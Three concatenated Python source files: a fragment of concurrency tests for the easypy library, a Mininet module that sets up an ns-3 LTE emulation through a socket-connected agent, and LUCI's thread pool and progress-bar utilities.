m.call(check)
args_list = (c[0] for c in _logger.info.call_args_list)
for args in args_list:
assert "test_multiobject_logging.<locals>.check" == args[2]
assert "easypy/tests/test_concurrency.py" in args[4]
def test_multiobject_types():
assert isinstance(MultiObject(range(5)), MultiObject[int])
assert not isinstance(MultiObject(range(5)), MultiObject[str])
class A(): ...
class B(A): ...
assert issubclass(MultiObject[A], MultiObject)
assert not issubclass(MultiObject[A], A)
assert issubclass(MultiObject[B], MultiObject[A])
assert not issubclass(MultiObject[A], MultiObject[B])
assert isinstance(MultiObject([B()]), MultiObject[A])
assert not isinstance(MultiObject([A()]), MultiObject[B])
assert isinstance(MultiObject[A]([B()]), MultiObject[A])
assert isinstance(MultiObject[A]([B()]), MultiObject[B])
assert isinstance(MultiObject[int](range(5)), MultiObject[int])
with pytest.raises(TypeError):
assert MultiObject[str](range(5))
assert isinstance(MultiObject[str]("123").call(int), MultiObject[int])
def test_multiobject_namedtuples():
from collections import namedtuple
class Something(namedtuple("Something", "a b")):
pass
def ensure_not_expanded(something):
# This will probably fail before these asserts
assert hasattr(something, 'a')
assert hasattr(something, 'b')
objects = [Something(1, 2), Something(2, 3), Something(3, 4)]
MultiObject(objects).call(ensure_not_expanded)
@pytest.mark.usefixtures('concurrency_enabled_and_disabled')
def test_multiexception_api():
with pytest.raises(MultiException) as exc:
MultiObject([0, 5]).call(lambda i: 10 // i)
    failed, successful = exc.value.futures
    assert failed.done()
    with pytest.raises(ZeroDivisionError):
        failed.result()
    assert isinstance(failed.exception(), ZeroDivisionError)
    assert successful.done()
    assert successful.result() == 2
    assert successful.exception() is None
def test_multiexception_types():
class OK(Exception):
pass
class BAD(object):
pass
class OKBAD(OK, BAD):
pass
with pytest.raises(AssertionError):
MultiException[BAD]
def raise_it(typ):
raise typ()
with pytest.raises(MultiException[OK]):
MultiObject([OK]).call(raise_it)
with pytest.raises(MultiException[OKBAD]):
MultiObject([OKBAD]).call(raise_it)
with pytest.raises(MultiException[OK]):
MultiObject([OKBAD]).call(raise_it)
@pytest.mark.parametrize('throw', [False, True])
def test_concurrent_done_status(throw):
from threading import Event
continue_func = Event()
def func():
continue_func.wait()
if throw:
raise Exception()
with concurrent(func, throw=False) as c:
assert not c.done()
continue_func.set()
sleep(0.1)
assert c.done()
assert c.done()
def test_concurrent_real_thread():
from easypy.concurrency import IS_GEVENT
from gevent.monkey import get_original
import logging
sleep = get_original("time", "sleep")
current_thread = get_original("threading", "get_ident")
main_thread = current_thread()
ran = 0
def log_and_sleep():
nonlocal ran
logging.info("test")
sleep(.1)
ran += 1
return current_thread()
if IS_GEVENT:
before = ran
with concurrent(log_and_sleep, real_thread_no_greenlet=True) as c:
pass
result = c.result()
assert ran == before + 1
assert main_thread != result
before = ran
with concurrent(log_and_sleep) as c:
pass
result = c.result()
assert ran == before + 1
assert main_thread == result
else:
before = ran
with concurrent(log_and_sleep, real_thread_no_greenlet=True) as c:
pass
result = c.result()
assert ran == before + 1
assert main_thread != result
before = ran
with concurrent(log_and_sleep) as c:
pass
result = c.result()
assert ran == before + 1
assert main_thread != result
assert ran
|
lte.py
|
import re
import socket
from time import sleep
import mininet.node
import mininet.link
from mininet.log import info
from mininet.util import moveIntf
from mininet.cluster.link import RemoteLink
class Lte (object):
def __init__ (self, tdf=1, mode='Master', imsiBase=0, cellIdBase=0,
ueIpBase='7.0.0.1', ueGwIpAddr='7.0.0.1',
pgwIpBase='1.0.0.0', pgwMask='255.0.0.0',
epcSwitch=None, agentIp=None, agentPort=53724, logFile=None,
homeEnbTxPower=30.0, slaveName='slaveTap'):
        if epcSwitch is None:
            info ('*** error: epcSwitch is a required argument.\n')
            return
        elif agentIp is None:
            info ('*** error: agentIp is a required argument.\n')
            return
self.epcSwitch = epcSwitch
self.ueIpBase = ueIpBase
self.ueGwIpAddr = ueGwIpAddr
self.tapBridgeIntfs = []
self.ueIndex = -1
self.startAgent ()
self.csock = None
        while self.csock is None:
self.csock = self.connectAgent (agentIp, agentPort)
if mode == 'Master':
self.addEpcEntity (self.epcSwitch, 'pgwTap')
self.addEpcEntity (self.epcSwitch, 'sgwTap')
self.addEpcEntity (self.epcSwitch, 'mmeTap')
self.addEpcEntity (self.epcSwitch, 'masterTap')
self.nextAddr = 2
elif mode == 'Slave':
IpBase = re.sub (r'[0-9]*\.([0-9]*\.[0-9]*\.[0-9])', r'0.\1', ueIpBase)
self.csock.sendall ('Config.SetDefault ("ns3::TapEpcHelper::EpcSlaveDeviceName", StringValue ("{0}"))\n'.format (slaveName))
self.csock.sendall ('Config.SetDefault ("ns3::TapEpcHelper::SlaveUeIpAddressBase", StringValue ("{0}"))\n'.format (IpBase))
self.csock.sendall ('Config.SetDefault ("ns3::TapEpcHelper::SlaveIpAddressBase", StringValue ("{0}"))\n'.format (IpBase))
self.addEpcEntity (self.epcSwitch, slaveName)
self.nextAddr = 1
else:
info ('*** error: mode should be Master or Slave.\n')
self.csock.sendall ("exit")
return
self.csock.sendall ('LogComponentEnable ("TapEpcHelper", LOG_LEVEL_ALL)\n')
self.csock.sendall ('LogComponentEnable ("TapEpcMme", LOG_LEVEL_ALL)\n')
self.csock.sendall ('LogComponentEnable ("EpcSgwPgwApplication", LOG_LEVEL_ALL)\n')
self.csock.sendall ('LogComponentEnable ("FdNetDevice", LOG_LEVEL_DEBUG)\n')
self.csock.sendall ('LogComponentEnable ("TeidDscpMapping", LOG_LEVEL_LOGIC)\n')
self.csock.sendall ('LogComponentEnable ("TapEpcEnbApplication", LOG_LEVEL_ALL)\n')
self.csock.sendall ('GlobalValue.Bind ("SimulatorImplementationType", StringValue ("ns3::RealtimeSimulatorImpl"))\n')
self.csock.sendall ('GlobalValue.Bind ("ChecksumEnabled", BooleanValue (True))\n')
self.csock.sendall ('Config.SetDefault ("ns3::LteSpectrumPhy::CtrlErrorModelEnabled", BooleanValue (False))\n')
self.csock.sendall ('Config.SetDefault ("ns3::LteSpectrumPhy::DataErrorModelEnabled", BooleanValue (False))\n')
self.csock.sendall ('Config.SetDefault ("ns3::TcpSocket::SegmentSize", UintegerValue (2440))\n')
self.csock.sendall ('Config.SetDefault ("ns3::LteHelper::Scheduler", StringValue ("ns3::FdMtFfMacScheduler"))\n')
self.csock.sendall ('Config.SetDefault ("ns3::TapEpcHelper::Mode", StringValue ("{0}"))\n'.format (mode))
self.csock.sendall ('Config.SetDefault ("ns3::LteEnbPhy::TxPower", DoubleValue ({0}))\n'.format (homeEnbTxPower))
self.csock.sendall ('LteTimeDilationFactor.SetTimeDilationFactor ({0})\n'.format (tdf))
        if logFile is not None:
self.csock.sendall ('Config.SetDefault ("ns3::TapEpcHelper::LogFile", StringValue ("{0}"))\n'.format (logFile))
self.csock.sendall ('attachDelay = 10.0\n')
self.csock.sendall ('lteHelper = LteHelper ()\n')
self.csock.sendall ('lteHelper.SetImsiCounter ({0})\n'.format (imsiBase))
self.csock.sendall ('lteHelper.SetCellIdCounter ({0})\n'.format (cellIdBase))
self.csock.sendall ('tapEpcHelper = TapEpcHelper ()\n')
self.csock.sendall ('lteHelper.SetEpcHelper (tapEpcHelper)\n')
self.csock.sendall ('tapEpcHelper.Initialize ()\n')
if mode == 'Master':
self.csock.sendall ('pgw = tapEpcHelper.GetPgwNode ()\n')
self.csock.sendall ('tap = TapFdNetDeviceHelper ()\n')
self.csock.sendall ('tap.SetDeviceName ("pgwTap")\n')
self.csock.sendall ('tap.SetTapMacAddress (Mac48Address.Allocate ())\n')
self.csock.sendall ('pgwDevice = tap.Install (pgw)\n')
self.csock.sendall ('ipv4Helper = Ipv4AddressHelper ()\n')
self.csock.sendall ('ipv4Helper.SetBase (Ipv4Address ("{0}"), Ipv4Mask ("{1}"))\n'.format (pgwIpBase, pgwMask))
self.csock.sendall ('pgwIpIfaces = ipv4Helper.Assign (pgwDevice)\n')
self.csock.sendall ('mobility = MobilityHelper ()\n')
self.csock.sendall ('enbLteDevs = NetDeviceContainer ()\n')
self.csock.sendall ('ueLteDevs = NetDeviceContainer ()\n')
self.csock.sendall ('internetStack = InternetStackHelper ()\n')
self.csock.sendall ('internetStack.SetIpv6StackInstall (False)\n')
self.csock.sendall ('Simulator.Schedule (Seconds (attachDelay), LteHelper.Attach, lteHelper, ueLteDevs)\n')
self.csock.sendall ('def run ():\n')
self.csock.sendall (' Simulator.Stop (Seconds (86400))\n')
self.csock.sendall (' Simulator.Run ()\n')
self.csock.sendall ('nsThread = Thread (target = run)\n')
self.csock.sendall ('tapBridges = []\n')
def startAgent (self):
self.epcSwitch.rcmd ("/usr/bin/opennet-agent.py start")
def stopAgent (self):
self.epcSwitch.rcmd ("/usr/bin/opennet-agent.py stop")
def connectAgent (self, ip, port):
csock = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
try:
info ('*** Connecting to opennet-agent... ')
csock.connect ((ip, port))
        except socket.error as exc:
            info ('Failed: {0}\n'.format (exc))
            return None
        else:
            info ('Succeeded\n')
            return csock
def addEpcEntity (self, node, intfName):
port = node.newPort ()
self.TapIntf (intfName, node, port)
def addEnb (self, node, intfName, mobilityType="ns3::ConstantPositionMobilityModel", position=None, velocity=None):
port = node.newPort ()
self.TapIntf (intfName, node, port)
self.csock.sendall ('nsNode = Node ()\n')
self.csock.sendall ('mobility.SetMobilityModel ("{0}")\n'.format (mobilityType))
self.csock.sendall ('mobility.Install (nsNode)\n')
        if position is not None:
self.csock.sendall ('mm = nsNode.GetObject(MobilityModel.GetTypeId())\n')
self.csock.sendall ('mm.SetPosition(Vector({0}, {1}, {2}))\n'.format (position[0], position[1], position[2]))
        if velocity is not None and mobilityType == "ns3::ConstantVelocityMobilityModel":
self.csock.sendall ('mm = nsNode.GetObject(MobilityModel.GetTypeId())\n')
self.csock.sendall ('mm.SetVelocity(Vector({0}, {1}, {2}))\n'.format (velocity[0], velocity[1], velocity[2]))
self.csock.sendall ('enbLteDev = lteHelper.InstallEnbDevice (NodeContainer (nsNode))\n')
self.csock.sendall ('enbLteDevs.Add (enbLteDev)\n')
def addUe (self, node, mobilityType="ns3::ConstantPositionMobilityModel", position=None, velocity=None):
self.ueIndex += 1
node.cmd ('sysctl -w net.ipv6.conf.all.disable_ipv6=1')
port = node.newPort ()
intfName = "{0}-eth{1}".format (node.name, port)
self.csock.sendall ('nsNode = Node ()\n')
self.csock.sendall ('mobility.SetMobilityModel ("{0}")\n'.format (mobilityType))
self.csock.sendall ('mobility.Install (nsNode)\n')
        if position is not None:
self.csock.sendall ('mm = nsNode.GetObject(MobilityModel.GetTypeId())\n')
self.csock.sendall ('mm.SetPosition(Vector({0}, {1}, {2}))\n'.format (position[0], position[1], position[2]))
        if velocity is not None and mobilityType == "ns3::ConstantVelocityMobilityModel":
self.csock.sendall ('mm = nsNode.GetObject(MobilityModel.GetTypeId())\n')
self.csock.sendall ('mm.SetVelocity(Vector({0}, {1}, {2}))\n'.format (velocity[0], velocity[1], velocity[2]))
self.csock.sendall ('ueLteDev = lteHelper.InstallUeDevice (NodeContainer (nsNode))\n')
self.csock.sendall ('ueLteDevs.Add (ueLteDev)\n')
self.csock.sendall ('internetStack.Install (nsNode)\n')
self.csock.sendall ('tapEpcHelper.AssignUeIpv4Address (ueLteDev)\n')
self.csock.sendall ('gatewayMacAddr = tapEpcHelper.GetUeDefaultGatewayMacAddress ()\n')
ueIp = self.allocateIp ()
tbIntf = self.TapBridgeIntf (intfName, node, port, self.ueGwIpAddr, ueIp, self.epcSwitch, self.csock)
self.tapBridgeIntfs.append (tbIntf)
return ueIp, self.ueIndex
def addEpsBearer (self, ueIndex=0, localPortStart=0, localPortEnd=65535, remotePortStart=0, remotePortEnd=65535, qci='EpsBearer.NGBR_VIDEO_TCP_DEFAULT'):
self.csock.sendall ('tft = EpcTft ()\n')
self.csock.sendall ('pf = EpcTft.PacketFilter ()\n')
self.csock.sendall ('pf.localPortStart = {0}\n'.format (localPortStart))
self.csock.sendall ('pf.localPortEnd = {0}\n'.format (localPortEnd))
self.csock.sendall ('pf.remotePortStart = {0}\n'.format (remotePortStart))
self.csock.sendall ('pf.remotePortEnd = {0}\n'.format (remotePortEnd))
self.csock.sendall ('tft.Add (pf)\n')
self.csock.sendall ('bearer = EpsBearer ({0})\n'.format (qci))
self.csock.sendall ('Simulator.Schedule (Seconds (attachDelay), LteHelper.ActivateDedicatedEpsBearer, lteHelper, ueLteDevs.Get ({0}), bearer, tft)\n'.format (ueIndex))
def allocateIp (self):
        pat = r'[0-9]*\.[0-9]*\.[0-9]*\.'
base = (re.findall (pat, self.ueIpBase))[0]
ip = "{0}{1}".format (base, self.nextAddr)
self.nextAddr += 1
return ip
def start (self):
self.csock.sendall ('if nsThread.isAlive ():\n csock.sendall ("True")\nelse:\n csock.sendall ("False")\n')
while True:
data = self.csock.recv (1024)
if data == "True":
info ('*** NS-3 thread is already running\n')
return
elif data == "False":
info ('*** Starting NS-3 thread\n')
break
self.disableIpv6 (self.epcSwitch)
self.csock.sendall ('nsThread.start ()\n')
info ('*** moveIntoNamespace\n')
for tbIntf in self.tapBridgeIntfs:
info ('{0} '.format (tbIntf.name))
tbIntf.moveIntoNamespace ()
info ('\n')
self.enableIpv6 (self.epcSwitch)
def stop (self):
self.csock.sendall ('Simulator.Stop (Seconds (1))\n')
self.csock.sendall ('while nsThread.isAlive ():\n sleep (0.1)\n')
def clear (self):
self.csock.sendall ('Simulator.Destroy ()\n')
self.csock.sendall ('exit ()\n')
self.csock.close ()
self.stopAgent ()
def disableIpv6 (self, node):
node.rcmd ('sysctl -w net.ipv6.conf.all.disable_ipv6=1')
def enableIpv6 (self, node):
node.rcmd ('sysctl -w net.ipv6.conf.all.disable_ipv6=0')
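# Usage sketch (hedged): the names s1 and h1 are illustrative; epcSwitch must
# be a Mininet node exposing rcmd(), and agentIp the host running
# opennet-agent.
#   lte = Lte (epcSwitch=s1, agentIp='192.168.0.10')
#   lte.addEnb (s1, 'enbTap')
#   ueIp, ueIndex = lte.addUe (h1)
#   lte.start ()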
class TapIntf (mininet.link.Intf):
"""
TapIntf is a Linux TAP interface.
"""
def __init__ (self, name=None, node=None, port=None, **params):
self.name = name
self.node = node
self.createTap (self.name)
mininet.link.Intf.__init__ (self, self.name, node, port, **params)
def createTap (self, name):
self.node.cmd ('ip tuntap add {0} mode tap'.format (name))
class TapBridgeIntf (mininet.link.Intf):
"""
TapBridgeIntf is a Linux TAP interface, which is bridged with an NS-3 NetDevice.
"""
def __init__ (self, name=None, node=None, port=None, ueGwIpAddr=None, ueIp=None,
localNode=None, csock=None, **params):
self.name = name
self.node = node
self.ueGwIpAddr = ueGwIpAddr
self.ueIp = ueIp
self.localNode = localNode
self.csock = csock
self.createTap (self.name)
self.delayedMove = True
        self.inRightNamespace = not node.inNamespace
mininet.link.Intf.__init__ (self, name, node, port, **params)
self.csock.sendall ('nsDevice = ueLteDev.Get (0)\n')
self.csock.sendall ('tapBridgeHelper = TapBridgeHelper ()\n')
self.csock.sendall ('tapBridgeHelper.SetAttribute ("Mode", StringValue ("ConfigureLocal"))\n')
self.csock.sendall ('tapBridgeHelper.SetAttribute ("DeviceName", StringValue ("{0}"))\n'.format (self.name))
self.csock.sendall ('macAddress = Mac48Address.Allocate ()\n')
self.csock.sendall ('tapBridgeHelper.SetAttribute ("MacAddress", Mac48AddressValue (macAddress))\n')
self.csock.sendall ('tb = tapBridgeHelper.Install (nsNode, nsDevice)\n')
self.csock.sendall ('tapBridges.append (tb)\n')
self.csock.sendall ('dev = nsDevice.GetObject (LteUeNetDevice.GetTypeId ())\n')
self.csock.sendall ('dev.SetMacAddress (macAddress)\n')
self.csock.sendall ('dev.SetGatewayMacAddress (gatewayMacAddr)\n')
def moveIntoNamespace (self):
while True:
self.csock.sendall ('if tapBridges[-1].IsLinkUp():\n csock.sendall ("True")\nelse:\n csock.sendall ("False")\n')
data = self.csock.recv (1024)
if data == "True":
break
else:
sleep (0.1)
RemoteLink.moveIntf (self.name, self.node)
self.node.cmd ('ip link set dev {0} up'.format (self.name))
self.node.cmd ('ip addr add dev {0} {1}/8'.format (self.name, self.ueIp))
self.node.cmd ('ip route add default via {0}'.format (self.ueGwIpAddr))
self.node.cmd ('arp -s {0} 00:00:00:00:00:00'.format (self.ueGwIpAddr))
        pat = r'[0-9]*\.'
route = (re.findall (pat, self.ueIp))[0] + '0.0.0'
self.node.cmd ('ip route del {0}/8'.format (route))
def cmd (self, *args, **kwargs):
        if self.inRightNamespace:
return self.node.cmd (*args, **kwargs)
else:
return self.localNode.cmd (*args, **kwargs)
def createTap (self, name):
self.node.cmd ('ip tuntap add {0} mode tap'.format (name))
self.node.cmd ('ip link set dev {0} netns 1'.format (name))
|
threading_utils.py
|
# Copyright 2013 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.
"""Classes and functions related to threading."""
import functools
import inspect
import logging
import os
import queue
import sys
import threading
import time
import traceback
# Priorities for tasks in AutoRetryThreadPool, particular values are important.
PRIORITY_HIGH = 1 << 8
PRIORITY_MED = 2 << 8
PRIORITY_LOW = 3 << 8
class LockWithAssert:
"""Wrapper around (non recursive) Lock that tracks its owner."""
def __init__(self):
self._lock = threading.Lock()
self._owner = None
def __enter__(self):
self._lock.acquire()
assert self._owner is None
self._owner = threading.current_thread()
def __exit__(self, _exc_type, _exec_value, _traceback):
self.assert_locked('Releasing unowned lock')
self._owner = None
self._lock.release()
return False
def assert_locked(self, msg=None):
"""Asserts the lock is owned by running thread."""
assert self._owner == threading.current_thread(), msg
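# Usage sketch (hedged): assert_locked() documents lock-ownership
# expectations at sensitive points.
#   lock = LockWithAssert()
#   with lock:
#       lock.assert_locked('must hold the lock here')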
class ThreadPoolError(Exception):
"""Base class for exceptions raised by ThreadPool."""
class ThreadPoolEmpty(ThreadPoolError):
"""Trying to get task result from a thread pool with no pending tasks."""
class ThreadPoolClosed(ThreadPoolError):
"""Trying to do something with a closed thread pool."""
class ThreadPool:
"""Multithreaded worker pool with priority support.
When the priority of tasks match, it works in strict FIFO mode.
"""
QUEUE_CLASS = queue.PriorityQueue
  # Enqueueing None causes the worker to stop.
  # Python 3 cannot order None against an integer, so putting None in a
  # priority queue would raise TypeError. Use sys.maxsize instead, since
  # lower priority values take precedence.
TASK_END_SENTINEL = (sys.maxsize,)
def __init__(self, initial_threads, max_threads, queue_size, prefix=None):
"""Immediately starts |initial_threads| threads.
Arguments:
initial_threads: Number of threads to start immediately. Can be 0 if it is
uncertain that threads will be needed.
max_threads: Maximum number of threads that will be started when all the
threads are busy working. Often the number of CPU cores.
queue_size: Maximum number of tasks to buffer in the queue. 0 for
unlimited queue. A non-zero value may make add_task()
blocking.
prefix: Prefix to use for thread names. Pool's threads will be
named '<prefix>-<thread index>'.
"""
prefix = prefix or 'tp-0x%0x' % id(self)
logging.debug(
'New ThreadPool(%d, %d, %d): %s', initial_threads, max_threads,
queue_size, prefix)
assert initial_threads <= max_threads
assert max_threads <= 1024
self.tasks = self.QUEUE_CLASS(queue_size)
self._max_threads = max_threads
self._prefix = prefix
# Used to assign indexes to tasks.
self._num_of_added_tasks_lock = threading.Lock()
self._num_of_added_tasks = 0
    # Lock that protects everything below (including the condition variable).
self._lock = threading.Lock()
# Condition 'bool(_outputs) or bool(_exceptions) or _pending_count == 0'.
self._outputs_exceptions_cond = threading.Condition(self._lock)
self._outputs = []
self._exceptions = []
# Number of pending tasks (queued or being processed now).
self._pending_count = 0
# List of threads.
self._workers = []
# Number of threads that are waiting for new tasks.
self._ready = 0
# Number of threads already added to _workers, but not yet running the loop.
self._starting = 0
# True if close was called. Forbids adding new tasks.
self._is_closed = False
for _ in range(initial_threads):
self._add_worker()
def _add_worker(self):
"""Adds one worker thread if there isn't too many. Thread-safe."""
with self._lock:
if len(self._workers) >= self._max_threads or self._is_closed:
return False
worker = threading.Thread(
name='%s-%d' % (self._prefix, len(self._workers)), target=self._run)
self._workers.append(worker)
self._starting += 1
logging.debug('Starting worker thread %s', worker.name)
worker.daemon = True
worker.start()
return True
def add_task(self, priority, func, *args, **kwargs):
"""Adds a task, a function to be executed by a worker.
Arguments:
- priority: priority of the task versus others. Lower priority takes
precedence.
- func: function to run. Can either return a return value to be added to the
output list or be a generator which can emit multiple values.
- args and kwargs: arguments to |func|. Note that if func mutates |args| or
|kwargs| and that the task is retried, see
AutoRetryThreadPool, the retry will use the mutated
values.
Returns:
Index of the item added, e.g. the total number of enqueued items up to
now.
"""
assert isinstance(priority, int)
assert callable(func)
with self._lock:
if self._is_closed:
raise ThreadPoolClosed('Can not add a task to a closed ThreadPool')
start_new_worker = (
# Pending task count plus new task > number of available workers.
self.tasks.qsize() + 1 > self._ready + self._starting and
# Enough slots.
len(self._workers) < self._max_threads
)
self._pending_count += 1
with self._num_of_added_tasks_lock:
self._num_of_added_tasks += 1
index = self._num_of_added_tasks
self.tasks.put((priority, index, func, args, kwargs))
if start_new_worker:
self._add_worker()
return index
def _run(self):
"""Worker thread loop. Runs until a None task is queued."""
# Thread has started, adjust counters.
with self._lock:
self._starting -= 1
self._ready += 1
while True:
try:
task = self.tasks.get()
finally:
with self._lock:
self._ready -= 1
try:
if task == self.TASK_END_SENTINEL:
# We're done.
return
_priority, _index, func, args, kwargs = task
if inspect.isgeneratorfunction(func):
for out in func(*args, **kwargs):
self._output_append(out)
else:
out = func(*args, **kwargs)
self._output_append(out)
except Exception as e:
logging.warning('Caught exception: %s', e)
exc_info = sys.exc_info()
logging.info(''.join(traceback.format_tb(exc_info[2])))
with self._outputs_exceptions_cond:
self._exceptions.append(exc_info)
          self._outputs_exceptions_cond.notify_all()
finally:
try:
# Mark thread as ready again, mark task as processed. Do it before
# waking up threads waiting on self.tasks.join(). Otherwise they might
# find ThreadPool still 'busy' and perform unnecessary wait on CV.
with self._outputs_exceptions_cond:
self._ready += 1
self._pending_count -= 1
if self._pending_count == 0:
              self._outputs_exceptions_cond.notify_all()
self.tasks.task_done()
except Exception as e:
# We need to catch and log this error here because this is the root
# function for the thread, nothing higher will catch the error.
logging.exception('Caught exception while marking task as done: %s',
e)
def _output_append(self, out):
if out is not None:
with self._outputs_exceptions_cond:
self._outputs.append(out)
        self._outputs_exceptions_cond.notify_all()
def join(self):
"""Extracts all the results from each threads unordered.
Call repeatedly to extract all the exceptions if desired.
Note: will wait for all work items to be done before returning an exception.
To get an exception early, use get_one_result().
"""
# TODO(maruel): Stop waiting as soon as an exception is caught.
self.tasks.join()
with self._outputs_exceptions_cond:
if self._exceptions:
e = self._exceptions.pop(0)
raise e[1]
out = self._outputs
self._outputs = []
return out
def get_one_result(self):
"""Returns the next item that was generated or raises an exception if one
occurred.
Raises:
ThreadPoolEmpty - no results available.
"""
# Get first available result.
for result in self.iter_results():
return result
# No results -> tasks queue is empty.
raise ThreadPoolEmpty('Task queue is empty')
def iter_results(self):
"""Yields results as they appear until all tasks are processed."""
while True:
# Check for pending results.
result = None
self._on_iter_results_step()
with self._outputs_exceptions_cond:
if self._exceptions:
e = self._exceptions.pop(0)
raise e[1]
if self._outputs:
# Remember the result to yield it outside of the lock.
result = self._outputs.pop(0)
else:
# No pending tasks -> all tasks are done.
if not self._pending_count:
return
# Some task is queued, wait for its result to appear.
# Use non-None timeout so that process reacts to Ctrl+C and other
# signals, see http://bugs.python.org/issue8844.
self._outputs_exceptions_cond.wait(timeout=0.1)
continue
yield result
def close(self):
"""Closes all the threads."""
# Ensure no new threads can be started, self._workers is effectively
# a constant after that and can be accessed outside the lock.
with self._lock:
if self._is_closed:
raise ThreadPoolClosed('Can not close already closed ThreadPool')
self._is_closed = True
for _ in range(len(self._workers)):
self.tasks.put(self.TASK_END_SENTINEL)
for t in self._workers:
# 'join' without timeout blocks signal handlers, spin with timeout.
while t.is_alive():
t.join(30)
logging.debug(
'Thread pool \'%s\' closed: spawned %d threads total',
self._prefix, len(self._workers))
def abort(self):
"""Empties the queue.
To be used when the pool should stop early, like when Ctrl-C was detected.
Returns:
Number of tasks cancelled.
"""
index = 0
while True:
try:
self.tasks.get_nowait()
self.tasks.task_done()
index += 1
except queue.Empty:
return index
def _on_iter_results_step(self):
pass
def __enter__(self):
"""Enables 'with' statement."""
return self
def __exit__(self, _exc_type, _exc_value, _traceback):
"""Enables 'with' statement."""
self.close()
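# Usage sketch (hedged): a minimal round trip through ThreadPool; join() must
# run inside the 'with' block, since __exit__ closes the pool.
#   with ThreadPool(initial_threads=1, max_threads=4, queue_size=0) as pool:
#       for i in range(10):
#           pool.add_task(PRIORITY_MED, lambda n=i: n * n)
#       squares = pool.join()   # unordered list of results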
class AutoRetryThreadPool(ThreadPool):
"""Automatically retries enqueued operations on exception."""
# See also PRIORITY_* module-level constants.
INTERNAL_PRIORITY_BITS = (1<<8) - 1
def __init__(self, exceptions, retries, *args, **kwargs):
"""
Arguments:
exceptions: list of exception classes that can be retried on.
retries: maximum number of retries to do.
"""
assert exceptions and all(issubclass(e, Exception) for e in exceptions), (
exceptions)
assert 1 <= retries <= self.INTERNAL_PRIORITY_BITS
super(AutoRetryThreadPool, self).__init__(*args, **kwargs)
self._swallowed_exceptions = tuple(exceptions)
self._retries = retries
def add_task(self, priority, func, *args, **kwargs):
"""Tasks added must not use the lower priority bits since they are reserved
for retries.
"""
assert (priority & self.INTERNAL_PRIORITY_BITS) == 0
return super(AutoRetryThreadPool, self).add_task(
priority,
self._task_executer,
priority,
None,
func,
*args,
**kwargs)
def add_task_with_channel(self, channel, priority, func, *args, **kwargs):
"""Tasks added must not use the lower priority bits since they are reserved
for retries.
"""
assert (priority & self.INTERNAL_PRIORITY_BITS) == 0
return super(AutoRetryThreadPool, self).add_task(
priority,
self._task_executer,
priority,
channel,
func,
*args,
**kwargs)
def _task_executer(self, priority, channel, func, *args, **kwargs):
"""Wraps the function and automatically retry on exceptions."""
try:
result = func(*args, **kwargs)
if channel is None:
return result
channel.send_result(result)
# pylint: disable=catching-non-exception
except self._swallowed_exceptions as e:
# Retry a few times, lowering the priority.
actual_retries = priority & self.INTERNAL_PRIORITY_BITS
if actual_retries < self._retries:
priority += 1
logging.debug(
'Swallowed exception \'%s\'. Retrying at lower priority %X',
e, priority)
super(AutoRetryThreadPool, self).add_task(
priority,
self._task_executer,
priority,
channel,
func,
*args,
**kwargs)
return
if channel is None:
raise
channel.send_exception()
except Exception:
if channel is None:
raise
channel.send_exception()
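# Usage sketch (hedged): flaky_fetch is hypothetical. Priorities must leave
# the low INTERNAL_PRIORITY_BITS clear; those bits encode the retry count.
#   pool = AutoRetryThreadPool([IOError], retries=3,
#                              initial_threads=1, max_threads=4, queue_size=0)
#   pool.add_task(PRIORITY_HIGH, flaky_fetch)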
class IOAutoRetryThreadPool(AutoRetryThreadPool):
"""Thread pool that automatically retries on IOError.
Supposed to be used for IO bound tasks, and thus default maximum number of
worker threads is independent of number of CPU cores.
"""
# Initial and maximum number of worker threads.
INITIAL_WORKERS = 2
MAX_WORKERS = 16 if sys.maxsize > 2**32 else 8
RETRIES = 5
def __init__(self):
super(IOAutoRetryThreadPool, self).__init__(
[IOError],
self.RETRIES,
self.INITIAL_WORKERS,
self.MAX_WORKERS,
0,
'io')
class Progress:
"""Prints progress and accepts updates thread-safely."""
def __init__(self, columns):
"""Creates a Progress bar that will updates asynchronously from the worker
threads.
Arguments:
columns: list of tuple(name, initialvalue), defines both the number of
columns and their initial values.
"""
assert all(
len(c) == 2 and isinstance(c[0], str) and isinstance(c[1], int)
for c in columns), columns
# Members to be used exclusively in the primary thread.
self.use_cr_only = True
self.unfinished_commands = set()
self.start = time.time()
self._last_printed_line = ''
self._columns = [c[1] for c in columns]
self._columns_lookup = dict((c[0], i) for i, c in enumerate(columns))
# Setting it to True forces a print on the first print_update() call.
self._value_changed = True
# To be used in all threads.
self._queued_updates = queue.Queue()
def update_item(self, name, raw=False, **kwargs):
"""Queue information to print out.
Arguments:
name: string to print out to describe something that was completed.
      raw: if True, prints the data without the header.
      <kwargs>: argument name is the name of a column; its value is the
                increment to that column, usually 0 or 1.
"""
    assert isinstance(name, str), repr(name)
assert isinstance(raw, bool), repr(raw)
assert all(isinstance(v, int) for v in kwargs.values()), repr(kwargs)
args = [(self._columns_lookup[k], v) for k, v in kwargs.items() if v]
self._queued_updates.put((name, raw, args))
def print_update(self):
"""Prints the current status."""
# Flush all the logging output so it doesn't appear within this output.
for handler in logging.root.handlers:
handler.flush()
got_one = False
while True:
try:
name, raw, args = self._queued_updates.get_nowait()
except queue.Empty:
break
for k, v in args:
self._columns[k] += v
self._value_changed = bool(args)
if not name:
# Even if raw=True, there's nothing to print.
continue
got_one = True
if raw:
# Prints the data as-is.
self._last_printed_line = ''
sys.stdout.write('\n%s\n' % name.strip('\n'))
else:
line, self._last_printed_line = self._gen_line(name)
sys.stdout.write(line)
if not got_one and self._value_changed:
# Make sure a line is printed in that case where statistics changes.
line, self._last_printed_line = self._gen_line('')
sys.stdout.write(line)
got_one = True
self._value_changed = False
if got_one:
# Ensure that all the output is flushed to prevent it from getting mixed
# with other output streams (like the logging streams).
sys.stdout.flush()
if self.unfinished_commands:
logging.debug('Waiting for the following commands to finish:\n%s',
'\n'.join(self.unfinished_commands))
def _gen_line(self, name):
"""Generates the line to be printed."""
next_line = ('[%s] %6.2fs %s') % (
self._render_columns(), time.time() - self.start, name)
# Fill it with whitespace only if self.use_cr_only is set.
prefix = ''
if self.use_cr_only and self._last_printed_line:
prefix = '\r'
if self.use_cr_only:
suffix = ' ' * max(0, len(self._last_printed_line) - len(next_line))
else:
suffix = '\n'
return '%s%s%s' % (prefix, next_line, suffix), next_line
def _render_columns(self):
"""Renders the columns."""
    # Materialize as a list; a map() iterator would be exhausted by max() below.
    columns_as_str = [str(c) for c in self._columns]
    max_len = max(len(c) for c in columns_as_str)
return '/'.join(i.rjust(max_len) for i in columns_as_str)
